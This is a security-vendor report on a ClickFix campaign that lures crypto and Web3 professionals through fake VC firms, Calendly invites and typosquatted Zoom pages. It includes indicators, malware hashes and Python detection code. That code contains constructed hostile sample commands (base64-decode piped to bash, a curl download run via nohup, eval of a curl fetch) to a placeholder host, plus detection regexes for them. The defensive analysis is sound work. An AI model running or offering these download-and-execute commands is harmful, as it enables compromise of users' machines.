ClickFix Attacks Are Targeting VC and Fintech Talent with New Multi-Stage Loader Techniques

Written by moonlock | Published 2026/03/31
Tech Story Tags: cybersecurity | cryptocurrency | cyber-threats | clickfix-attacks | mac-cybersecurity | macos-malware-threats | social-engineering-scam | good-company

TL;DR: ClickFix attacks have become increasingly popular among cybercriminals. They trick users into connecting their Macs to a malicious criminal network. Moonlock Lab uncovers a sophisticated ClickFix scheme that uses fake VC firms and personas to target crypto professionals with fake job opportunities.

No malware. No vulnerability exploit. No web download. ClickFix attacks, which have become increasingly popular among cybercriminals, are breaching Mac computers in large numbers. Their strength, and their weakest point, is the same thing: tricking users into connecting their own Macs to a malicious criminal network.

Once connected to the criminal network, the attackers gain full privilege and access, establish a communication channel, and deploy a series of payloads that steal data and crypto wallet credentials. This multi-stage loader attack uses macOS’s own language to appear legitimate and raise no flags. It has become a popular and standard technique among criminals who are moving away from standalone malware file downloads.

In this report, we look into why new ClickFix techniques are popular and successful. We also dive deep into a case example of a recent campaign discovered in the wild by the Moonlock Lab Team, which shares notable characteristics with the North Korean state-supported hacker campaign known as Contagious Interview.

In 2024, Microsoft reported that ClickFix was used as the initial technique in 47% of all attacks they detected. By the first half of 2025, ESET found that ClickFix attacks had surged by 517% in just six months. The technique, which began as a niche intrusion method in 2023, continued its uptrend use throughout 2025, as both cybercriminals and nation-state threat actors embraced it.

But what does a ClickFix attack look like from the users’ point of view? And why are they so popular?

The setup is familiar by now: a user lands on a page that looks like a Cloudflare verification, a broken video stream, or a routine browser check. Then the user clicks on the Cloudflare checkbox, and without knowing it, they write a command to their clipboard that sets up the attack.

The fake page then tries to guide users with simple step-by-step instructions on how to open their Mac terminal and paste a script there. All this happens while the ClickFix window displays a countdown timer to create a false sense of urgency.

Who falls for this type of cyberattack? So far, we have seen ClickFix attacks target high-value Mac users who work in the crypto, blockchain, Web3, AI, and software developer industries. However, the technique can be used against any type of user. This is why.

Tech-savvy users, accustomed to working in the Mac Terminal, may see no red flag in pasting a script into it, because they do exactly that every day. The average user, on the other hand, may think, “Well, this is how professionals fix things or download advanced software.” This is why ClickFix works on different types of users.

Threat actors love ClickFix because it requires no zero-day, no heavy stand-alone malware file, and can sidestep Endpoint Detection and Response (EDR), antivirus, and Mac’s built-in protection security suite, including Gatekeeper and Apple’s Transparency, Consent, and Control (TCC).

To summarize, the red flags to look out for are:

  • Cloudflare or “I’m not a robot” verifications: If you land on a website that asks you to verify that you are not a bot, be cautious. Cybercriminals can hide scripts behind the checkbox that, for example, gather information such as which OS you are using, so they can later serve you the malware or script specific to your OS.
  • Step-by-step instructions that include terminal commands: If a site gives you step-by-step instructions on how to copy and paste a script into your Mac Terminal, it is likely a ClickFix attack. Do not paste terminal commands on your Mac unless you are 100% sure they are safe.
  • ClickFix variations: There are several variations of ClickFix techniques to look out for. InstallFix attempts to trick users into copying a script to “fix” a browser, driver, webcam, or system issue that does not exist. “Drag and Drop” ClickFix asks users to drag a file directly into the Mac Terminal. Not all ClickFix attacks look the same, so look out for variations.
  • An immediate system password prompt: The first thing a multi-stage loader often does is prompt you for your system password. It needs this password to escalate privileges and to access and execute what only the system administrator (you) can. Do not type in your password after running a script in your Terminal or after installing any software.

It Starts With a LinkedIn Message: Fake Venture Capital and Blockchain Firms

In their latest investigation, the Moonlock Lab Team found a new ClickFix campaign operating in the wild that was targeting crypto and Web3 professionals.

This ClickFix attack starts with a message on LinkedIn. Blockchain industry professionals were contacted with a personalized message by Mykhailo Hureiev, who is listed on LinkedIn as Co-Founder and Managing Partner of SolidBit Capital, a Web3 and DeFi-focused investment firm.

The message and the LinkedIn contact appear legitimate but are fake and fabricated by the attacker. The personalized message references projects that those who were contacted actually work on. This gives the message a more human and professional tone, establishing trust.

The message then opens the door to a fake potential employment or work role opportunity and casually invites users to schedule a call via the legitimate Calendly app. As seen in the image below.

The Calendly link used by the attacker in this case is calendly[.]com/hureivemykhail/with-solidbit-meeting, which, as mentioned above, leverages legitimate Calendly.com infrastructure to send out phishing invites.

Besides Calendly.com links, the cybercriminals also offered users links to fake Zoom meetings and fake Google Meet meetings, again abusing known brands to establish fake legitimacy.

Another fake persona linked to this campaign, which we found through Whois service research when checking registrants of the malicious domain, is Antolli Bigdasch. Our online search revealed that Antolli Bigdasch is also listed as the founder of SolidBit Capital, the same entity that Mykhailo Hureiev claims to represent when engaging victims on LinkedIn.

Users who clicked on the Calendly link, chose a date and time, and filled in their personal data, including name and email, appear to have later received a fake Google Meet or Zoom link where a ClickFix technique delivered the malicious multi-stage loader.

As the image above shows, the IoC calendly[.]com/hureivemykhail/with-solidbit-meeting, still active when this report was being written, prompted users to schedule a date and time, and then asked them to fill in personal data in the form seen above, including Name, Email, and Comments.

A Broader Industrialized Campaign and Infrastructure

Besides the fake personas, the Moonlock Lab team found that attackers, leveraging AI, created a series of fabricated online company identities. This includes the fake SolidBit, MegaBit, and Lumax Capital VC firms.

As mentioned, SolidBit Capital is the identity tied to the Bigdasch registrant and the Mykhailo Hureiev LinkedIn persona.

MegaBit is an additional fake company discovered on the campaign infrastructure. Hosted on the fake Zoom domain at zoom[.]07usweb[.]us/homepage/, the site presents itself as an investment firm, with a polished dark-themed frontend, navigation tabs (Portfolio, About Us, Focus, Team, Contact Us, and Login), and an “Investment Team” page featuring four individuals, all displayed with AI-generated headshot photos.

The domain variant (07usweb[.]us vs. us07-web[.]us) confirms that this is the same operator rotating infrastructure identifiers while reusing the core naming pattern.

We also found that attackers had recently created a domain to host the fake Lumax Capital page. The Lumax Capital website, live and fully functional, also looks legitimate and professional, with working navigation, multiple tabs, and a fabricated company history.

Note that the headshots in the image above are also AI-generated.

What Happens When Users Schedule a Meeting with the Attackers?

Now that we have covered the lures and how attackers build convincing but fake online companies to establish trust before contacting users with fake job offers, let’s look at what happens when a user clicks on the calendar links or interacts with specific malicious sites.

When a victim clicks the fake Zoom or Google Meet link provided by the LinkedIn operator, they are directed to a page that appears to be a legitimate event website. In this case, the site references “The Digital Asset Conference III,” a real cryptocurrency event, while “Hedgeweek” is a well-established hedge fund industry news portal widely read by institutional investors, fund managers, and allocators.

Moonlock Lab reached out to Hedgeweek to notify them of the typosquat domain abusing their brand, but did not receive a response at the time of publication.

The attackers overlay the fake pages with a fake Cloudflare-branded verification modal.

When a user clicks on the “I’m not a robot” checkbox, the attacker's page silently runs JavaScript that writes a malicious command to the user’s clipboard using navigator.clipboard.writeText().

The command is OS-specific. This means the script detects the operating system of the user, via the User-Agent string, and then loads a ClickFix attack that includes a script that matches the user's operating system. Basically, if you are running Windows, you get a Windows OS script, while if you are running a Mac, you get a macOS script. The attack is therefore cross-platform.

The image below shows a ClickFix technique targeting Windows users, but as mentioned, attackers gain knowledge of what OS the user is using when they click on the “I’m not a Robot” checkbox.

Users who copy and paste the script on their terminal will, without knowing it, trigger the cyberattack, which executes stealthily in the background. Users are then redirected to a legitimate site to hide the attack.

While in the past we have observed ClickFix campaigns that infected users with macOS stealers like MacSync, this campaign is different.

On macOS, the bash one-liner checks for Python 3 and installs Homebrew from raw.githubusercontent.com if needed, weaponizing a trusted developer tool as cover. It then pulls a Python script from the same C2 via curl -H "User-Agent: macintosh", saves it to /tmp/hduwhv.py, and runs it under “nohup bash &” so it persists after the terminal closes.
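The chain just described (curl with a spoofed User-Agent writing into /tmp, then nohup launching that file from the same Terminal session) is a good candidate for a behavioural detection rule. The Python below is an added example, not code from the report or from Moonlock Lab: it runs a download-then-execute correlation over constructed process-execution records of the kind an EDR would log. The record layout, the placeholder C2 host c2.example.invalid and the benign events are assumptions; /tmp/hduwhv.py and the macintosh User-Agent value are taken from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    ts: float      # seconds on a constructed clock
    pid: int
    ppid: int
    image: str     # basename of the executable
    cmdline: str   # full command line as an EDR would record it


# Constructed sample telemetry, not captured from the campaign. The first chain
# mirrors the report: Terminal -> bash one-liner -> curl with a custom
# User-Agent writing /tmp/hduwhv.py -> nohup executing that file.
# c2.example.invalid is a placeholder host, not an indicator from the report.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1000.0, 400, 1, "Terminal",
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(1001.0, 501, 400, "bash", "bash -c '<one-liner pasted from the clipboard>'"),
    ProcEvent(1002.0, 502, 501, "curl",
              'curl -H "User-Agent: macintosh" -o /tmp/hduwhv.py http://c2.example.invalid/p'),
    ProcEvent(1003.5, 503, 501, "nohup", "nohup bash -c 'python3 /tmp/hduwhv.py' &"),
    # Benign activity: a developer fetching a file into /tmp without a spoofed
    # User-Agent, and running a project script from their home directory.
    ProcEvent(2000.0, 600, 400, "bash", "bash -c 'curl -fsSL https://example.com/a.tgz -o /tmp/a.tgz'"),
    ProcEvent(2001.0, 601, 600, "curl", "curl -fsSL https://example.com/a.tgz -o /tmp/a.tgz"),
    ProcEvent(2010.0, 602, 400, "python3", "python3 /Users/dev/project/run.py"),
]

# curl -H "User-Agent: ..." or --header "User-Agent: ..." (value captured)
UA_RE = re.compile(r"""(?:-H\s+|--header[\s=]+)["']?User-Agent:\s*([^"']+)["']?""", re.IGNORECASE)
# -o / --output pointing into a temporary directory (path captured)
OUT_RE = re.compile(r"(?:-o|--output)\s+((?:/private)?/tmp/\S+|\$TMPDIR/\S+)")
# images that would run a dropped file
EXEC_IMAGES = {"nohup", "bash", "sh", "zsh", "python", "python3", "osascript"}


@dataclass
class Finding:
    download_pid: int
    exec_pid: int
    path: str
    user_agent: str
    seconds_between: float
    session_root: int   # pid of the top-most ancestor seen (the Terminal here)


def _session_root(pid: int, by_pid: Dict[int, ProcEvent]) -> int:
    """Walk ppid links until the parent is unknown; guards against cycles."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def find_download_then_execute(events: List[ProcEvent], window: float = 60.0) -> List[Finding]:
    """Flag a curl with a custom User-Agent writing into /tmp when the same
    path is executed within `window` seconds inside the same session."""
    ordered = sorted(events, key=lambda e: e.ts)
    by_pid = {e.pid: e for e in ordered}
    findings: List[Finding] = []
    for dl in ordered:
        if dl.image != "curl":
            continue
        ua, out = UA_RE.search(dl.cmdline), OUT_RE.search(dl.cmdline)
        if not (ua and out):
            continue
        path = out.group(1)
        root = _session_root(dl.pid, by_pid)
        for ex in ordered:
            if not (dl.ts < ex.ts <= dl.ts + window):
                continue
            if ex.image in EXEC_IMAGES and path in ex.cmdline and _session_root(ex.pid, by_pid) == root:
                findings.append(Finding(dl.pid, ex.pid, path, ua.group(1).strip(), ex.ts - dl.ts, root))
                break
    return findings


if __name__ == "__main__":
    for f in find_download_then_execute(SAMPLE_EVENTS):
        print(f"download pid {f.download_pid} -> exec pid {f.exec_pid}: {f.path} "
              f"(UA={f.user_agent!r}, {f.seconds_between:.1f}s apart, session root {f.session_root})")
```

Requiring both the spoofed header and the temporary-directory target is what keeps the benign curl in the sample quiet; the session-root check stops two unrelated shells from being stitched into one finding, and the window can be widened for slower chains.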

A Technical Deep Dive into the macOS Payload

The fake Zoom app (SHA-256: 755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323), first flagged by @malwrhunterteam and analyzed by @L0Psec, is a Swift application that uses SwiftUI to render a credential-harvesting dialog mimicking a native macOS password prompt. The prompt is coded to window-shake if the user types in the incorrect password entry.

Once victims type in their credentials, they are captured and exfiltrated to a Telegram bot. The payload server at zoom[.]us05-web[.]us served macOS, Windows, and Linux payloads from the same endpoint via a numeric parameter.

Moonlock Lab continued analysis on two additional Mach-O binaries linked to this exact campaign, after they had been shared by @malwrhunterteam as related to fake Zoom domains.

Property   | Obfuscated version                                               | Non-obfuscated version
SHA-256    | 9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6 | 2fbd34eed9dbf57a44cf1540941fb43a793be27e13e937299167b2b67cb84d6b
File size  | 9.3 MB                                                           | 37.6 KB

Both samples perform the same core functions: retrieving a temporary directory path, downloading files from a remote server, re-signing them with ad-hoc code signatures, and executing them. The critical difference is in their construction:

The obfuscated version (9.3 MB) is inflated with garbage instructions distributed across two binary segments. This junk code is designed to bypass static analysis tools. Disassemblers like Ghidra struggle to process the binary efficiently, making quick triage impractical.

A scan on VirusTotal revealed that the sample itself was undetected by all major security engines at the time of discovery.

The non-obfuscated version (37.6 KB) contains the same functional logic without the padding. It appears to be either a development build or an earlier iteration of the payload. This sample was also undetected by most major security engines on VirusTotal at the time of discovery.

Why both versions were uploaded to VirusTotal remains unclear. Both achieved zero detections across all vendors for an extended period after submission, demonstrating that the threat actors have invested in evasion techniques that effectively bypass current static analysis heuristics.

Attribution: A Signature That's Been Seen Before

On February 9, 2026, Mandiant published findings on a FinTech intrusion attributed to UNC1069, a DPRK-linked actor tracked since 2018. Below, we note how both campaigns share notable similarities in techniques and malware that signal a likely attribution.

Element            | This campaign                       | Mandiant / UNC1069
Fake Zoom domain   | zoom[.]us07-web[.]us                | zoom[.]uswe05[.]us
Domain pattern     | zoom.us{XX}-web.us                  | zoom.uswe{XX}.us
Social engineering | LinkedIn → Calendly → fake Zoom     | Telegram → Calendly → fake Zoom
Delivery           | ClickFix (fake Cloudflare CAPTCHA)  | ClickFix (fake audio troubleshooting)
OS targeting       | macOS + Windows                     | macOS + Windows
Target sector      | Crypto / Web3                       | Crypto startups, developers

The domain naming pattern — zoom.us{XX}-web.us vs. zoom.uswe{XX}.us — is not coincidental. Definitive attribution remains open, but the tradecraft overlap is documented. This is what a DPRK-adjacent playbook looks like when it runs through a polished social engineering layer.
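The two naming patterns above, plus the rotated 07usweb[.]us variant from earlier in the report, can be turned into a hunting rule for DNS or proxy logs. The Python below is an added example, not code from Moonlock Lab, Mandiant or the report: it refangs a hostname, separates the registrable apex from the subdomain labels, and flags any name where a brand label such as zoom sits below an apex the brand does not own, with a stricter verdict when that apex matches the us{XX}-web.us, uswe{XX}.us or {XX}usweb.us shapes. The allowlist of legitimate apexes, the two-label apex rule and the log lines are assumptions. Real Zoom meeting hosts look like us04web.zoom.us, which is exactly what these lures imitate, so the classifier is checked to leave those alone.

```python
import re
from typing import Dict, List, Set, Tuple

# Apex domains the impersonated brands legitimately use. Only zoom.us and
# calendly.com appear in the report; the rest is an assumed allowlist that a
# defender would maintain.
LEGIT_APEX: Dict[str, Set[str]] = {
    "zoom": {"zoom.us", "zoom.com"},
    "calendly": {"calendly.com"},
    "google": {"google.com"},
}

# Registrable-domain shapes generalised from the report's indicators:
# zoom.us{XX}-web.us (this campaign), zoom.uswe{XX}.us (UNC1069, per Mandiant)
# and the rotated zoom.{XX}usweb.us variant.
CAMPAIGN_PATTERNS = [
    re.compile(r"^us\d{2}-web\.us$"),
    re.compile(r"^uswe\d{2}\.us$"),
    re.compile(r"^\d{2}usweb\.us$"),
]


def refang(domain: str) -> str:
    """Turn a defanged indicator such as zoom[.]us07-web[.]us back into a hostname."""
    return domain.replace("[.]", ".").strip().lower().rstrip(".")


def registrable(domain: str) -> str:
    # Assumption: two-label apex. A real deployment would consult a public-suffix list.
    return ".".join(refang(domain).split(".")[-2:])


def classify(domain: str) -> Tuple[str, str]:
    """Return (verdict, brand): legit, campaign-pattern, brand-in-subdomain or unrelated."""
    d = refang(domain)
    apex = registrable(d)
    sub_labels = d.split(".")[:-2]
    for brand, apexes in LEGIT_APEX.items():
        if apex in apexes:
            return ("legit", brand)
    for brand in LEGIT_APEX:
        if brand in sub_labels:            # brand name pushed into the subdomain of a foreign apex
            if any(p.match(apex) for p in CAMPAIGN_PATTERNS):
                return ("campaign-pattern", brand)
            return ("brand-in-subdomain", brand)
    return ("unrelated", "")


# Constructed resolver log lines (timestamp, client, "query", name, type);
# the first, fourth and fifth names are indicators from the report.
SAMPLE_DNS_LOG = """\
2026-03-31T09:58:12Z 10.1.2.3 query zoom.us07-web.us A
2026-03-31T09:58:14Z 10.1.2.3 query us04web.zoom.us A
2026-03-31T10:02:40Z 10.1.2.9 query calendly.com A
2026-03-31T10:05:01Z 10.1.2.3 query zoom.uswe05.us A
2026-03-31T10:05:02Z 10.1.2.3 query zoom.07usweb.us A
2026-03-31T10:06:30Z 10.1.2.7 query github.com A
2026-03-31T10:07:00Z 10.1.2.7 query zoom.example.net A
"""


def scan_dns_log(text: str) -> List[dict]:
    """Return one record per query whose name impersonates a brand."""
    flagged = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[2] != "query":
            continue
        verdict, brand = classify(parts[3])
        if verdict in ("campaign-pattern", "brand-in-subdomain"):
            flagged.append({"ts": parts[0], "client": parts[1], "domain": parts[3],
                            "verdict": verdict, "brand": brand})
    return flagged


if __name__ == "__main__":
    for rec in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{rec['ts']} {rec['client']} {rec['domain']}: {rec['verdict']} ({rec['brand']})")
```

The campaign-pattern verdict is the high-confidence one; brand-in-subdomain is a broader net that will also catch the next rotation of the same playbook, at the cost of needing a quick review of each hit.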

Recommendations and Mitigation Actions for Users

ClickFix campaigns reach the terminal stage because everything before it, including the LinkedIn message, the Calendly link, and the polished company website, has already cleared the target's informal trust threshold. By the time the CAPTCHA appears, skepticism is spent. Despite its sophistication and the weaponization of macOS’s own processes and language, there are still several things any user can do to stay safe from this cyberattack.

Know the Risks of Running Scripts on Your Mac Terminal

Whether you are a technically well-versed user or not, understanding the risks of running scripts in your Mac Terminal strengthens your cybersecurity. Apple itself appears to be trying to raise awareness of these risks with a new feature that warns users about pasting scripts into the Terminal. The feature is reported to work only on macOS Tahoe 26.4, and Apple has published no official statement on how it works or whether it plans to make the feature standard across all macOS versions. Released across the board, it would be a much-welcomed and useful addition.

If a Script Looks Like Gibberish, It’s Probably Malicious

Legitimate terminal macOS scripts are transparent and readable. If you come across a terminal script that looks like random letters, numbers, and symbols, this means it has been scrambled to hide something and is probably malicious.

eval and base64 --decode: Red Flag Commands

If you see a script that contains the commands eval, bash, or base64 --decode, do not run it in your terminal. The command eval gives a script permission to "run whatever follows as a program." This is not normal or used in safe scripts. The command base64 --decode, found at the end of such scripts, is the unscrambler, and the reason you see the script as a random string of letters instead of what it actually says.
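The red-flag list earlier in the report and the two sections above (scripts that look like gibberish, and eval / base64 --decode) can be combined into a single pre-execution check of the kind a paste-time warning or a clipboard monitor could apply. The Python below is an added example, not code from the report or from Moonlock Lab: it scores a pasted command against regexes for base64 decoding, eval, piping a download into a shell, spoofed User-Agent headers, temporary-directory paths, nohup or trailing-& backgrounding and sudo, and separately looks for long base64-alphabet tokens that mix cases and digits. The check names, the scoring weights and the sample commands are assumptions; the blob is constructed and the host c2.example.invalid is a placeholder, not an indicator from the report.

```python
import re
import shlex
from dataclasses import dataclass, field
from typing import Dict, List

# Each check is (name, weight, regex). Weight 3 means a single hit is enough to
# refuse the command; weight 1 is suspicious on its own and decisive when
# several combine (download + temp path + backgrounding is the report's chain).
CHECKS = [
    ("base64-decode",     3, re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("eval",              3, re.compile(r"\beval\b")),
    ("pipe-to-shell",     3, re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b|\$\(\s*(?:curl|wget)\b")),
    ("custom-user-agent", 1, re.compile(r"(?:-H\s+|--header[\s=]+)[\"']?(?i:user-agent):|\s-A\s|--user-agent")),
    ("temp-path",         1, re.compile(r"(?:/private)?/tmp/\S+|\$TMPDIR/")),
    ("background",        1, re.compile(r"\bnohup\b|\bdisown\b|\bsetsid\b|&\s*$")),
    ("asks-for-admin",    1, re.compile(r"\bsudo\b|with administrator privileges", re.I)),
]

# A long run of base64-alphabet text that mixes cases and digits is the
# "random letters, numbers and symbols" the report describes.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def looks_like_blob(token: str) -> bool:
    return (BLOB_RE.fullmatch(token) is not None
            and any(c.isupper() for c in token)
            and any(c.islower() for c in token)
            and any(c.isdigit() for c in token))


@dataclass
class Report:
    verdict: str                 # "ok", "review" or "block"
    score: int
    hits: List[str] = field(default_factory=list)


def check_command(cmd: str) -> Report:
    """Score one command line the way a paste-time warning could."""
    hits, score = [], 0
    for name, weight, rx in CHECKS:
        if rx.search(cmd):
            hits.append(name)
            score += weight
    try:
        tokens = shlex.split(cmd)
    except ValueError:           # unbalanced quotes: fall back to whitespace split
        tokens = cmd.split()
    if any(looks_like_blob(t) for t in tokens):
        hits.append("encoded-blob")
        score += 3
    verdict = "block" if score >= 3 else ("review" if score else "ok")
    return Report(verdict, score, hits)


# Constructed sample commands, not captured from the campaign. The blob is a
# made-up base64 string; c2.example.invalid is a placeholder host. The
# "dropper" line mirrors the shape the report describes (spoofed User-Agent,
# /tmp/hduwhv.py, nohup) without any real URL.
SAMPLE_COMMANDS: Dict[str, str] = {
    "b64-pipe": 'echo "aGVsbG8gd29ybGQgdGhpcyBpcyBhIGNvbnN0cnVjdGVkIHNhbXBsZQ==" | base64 --decode | bash',
    "dropper": 'curl -fsSL http://c2.example.invalid/s -H "User-Agent: macintosh" -o /tmp/hduwhv.py '
               '&& nohup bash -c "python3 /tmp/hduwhv.py" &',
    "eval-fetch": 'eval "$(curl -fsSL http://c2.example.invalid/x)"',
    "benign-brew": "brew install wget",
    "benign-fetch": "curl -fsSL https://example.com/a.tgz -o /tmp/a.tgz",
}

if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        r = check_command(cmd)
        print(f"{label:13s} {r.verdict:7s} score={r.score} hits={r.hits}")
```

A plain download into /tmp only earns a "review", which is the right level for a developer fetching a tarball; it is the combination of spoofed header, temporary path and backgrounding, or any single decode-and-run construct, that pushes a command to "block".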

Verify Job Offers

Unfortunately, in this day and age, if you get a job offer, you have to double-check and verify everything, and once you are done with that, do it again. Cybercriminals, from nation-state-supported actors to common scammers, are constantly preying on the job market and are well-resourced and skilled at what they do. Criminals have also embraced AI, which allows them to create fake pages and fake personas in just minutes. Applying zero trust and checking everything not twice but three times is highly recommended.

Here are the steps you can take to stay safe:

  • Verify the company. Check when the domain was registered, review the company’s digital footprint, and look closely at team photos or biographies that may be AI-generated or recently fabricated.
  • Be cautious if a conversation quickly moves off LinkedIn. If the sender insists on using their Zoom, Calendly, or Google Meet, run those external links through a URL checking tool.
  • Treat urgency as a red flag. Pressure to schedule quickly, move to private channels, or follow specific technical instructions to change settings on your device is often a key part of the manipulation.
  • Never paste commands into your terminal. No legitimate service will require you to open your terminal and run a command as part of a verification process.

The rule of thumb is to pause before doing anything you don’t fully understand. If a step feels unusual for a job interview, a partnership call, or an investment discussion, it probably is.

Conclusion

ClickFix attacks and multi-stage loaders, combined with sophisticated AI-driven social engineering, have become a gold standard on the dark web. Cybercriminals tend to stick with what works, so expect these techniques to evolve rather than disappear. What exactly the next ClickFix technique will look like is still unknown, but by understanding how the cyberattack works, you can build up your security posture.

Written by moonlock | Cybersecurity tech for humans
Published by HackerNoon on 2026/03/31